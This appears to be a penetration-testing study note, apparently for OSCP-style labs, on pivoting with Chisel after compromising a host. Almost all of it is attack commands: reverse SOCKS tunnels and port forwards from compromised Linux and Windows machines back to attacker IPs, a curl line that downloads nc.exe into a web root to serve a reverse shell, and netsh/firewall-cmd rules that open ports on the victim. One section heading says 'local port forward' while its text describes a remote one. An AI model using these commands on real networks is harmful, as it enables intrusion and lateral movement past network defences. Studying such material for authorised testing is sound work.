// notes/ Pivoting & Tunneling
🚀

Pivoting Chisel

Chisel works in a client server way so the chisel binary needs to be on both the attacking machine and the compromised server.

#post exploitation#adot8
source · oscp.adot8.com · post-exploitation/pivoting_chisel

Chisel

Chisel works in a client server way so the chisel binary needs to be on both the attacking machine and the compromised server.

Reverse Shell over SSH tunnel

Set up SSH tunnel and chisel server on your machine

code
01chisel server -p 1335 --reverse &

Set up chisel client on compromised webserver

code
01./chisel client 10.10.14.10:1335 R:9999:socks &
code
01Start-Job {.\chisel.exe client 192.168.45.237:1335 R:9999:socks}
02Start /B chisel.exe client 192.168.45.233:8080 R:9999:socks &
  • Connecting to chisel server (10.10.14.10) on port 1335
  • Anything coming into port 9999 put it out chisel server port 9999

Set up python server on port 9999 and download reverse shell from other machine

code
01curl http://172.16.1.100:9999/nc.exe -o C:\xampp\htdocs\nc.exe'

Repeat port forward but on nc listening port

code
01./chisel client 10.10.14.10:1335 1337:127.0.0.1:1337 &

Reverse SOCKS Proxy

First we need to set up the chisel server on our attacking machine

bash
$chisel server -p 1335 --reverse &

Next set up the client on the compromised server

bash
$./chisel client 10.50.102.164:1335 R:socks &
  • R:socks
    • R means remotes. This tells chisel that the server is waiting for a proxy or port forward to be made

The connection will be made on port 1335 but the actual proxy is opened on port 1080. So we will be using 1080 to send traffic through the proxy.

Local Port Forward

A remote port forward is when we connect back from a compromised target to create the forward.

Start the chisel server on the compromised host (you will also have to open up the firewall port)

bash
$./chisel_windows.exe server --port 54321 --reverse --socks5
powerquery
01netsh advfirewall firewall add rule name="Chisel-Adot8" dir=in action=allow protocol=tcp localport=15997

OR

bash
$firewall-cmd --zone=public --add-port 15997/tcp

Connect to the chisel server

bash
$chisel client 192.168.194.95:54321 127.0.0.1:9999:127.0.0.1:3306

{% hint style="info" %} Everything we send to 127.0.0.1:9999 will get sent to the target on 3306 {% endhint %}